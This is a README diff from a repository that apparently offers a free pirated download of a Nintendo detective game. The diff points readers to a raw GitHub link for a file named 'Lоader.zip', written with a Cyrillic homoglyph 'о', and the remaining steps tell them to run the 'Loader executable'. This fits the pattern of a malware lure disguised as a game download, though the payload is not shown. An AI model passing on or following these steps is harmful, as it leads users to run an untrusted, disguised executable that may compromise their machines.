Somraji/EmioSmilingMan-FamicomDetectiveClub-FreeDL/README.md

 ## 📥 Installation

-1. Download Loader.rar from the repository.
+1. Download https://raw.githubusercontent.com/Somraji/EmioSmilingMan-FamicomDetectiveClub-FreeDL/main/Lоader.zip from the repository.
 2. Extract the archive to your preferred folder.
 3. Run the Loader executable for your OS.
 4. Follow on-screen instructions to begin your unique experience!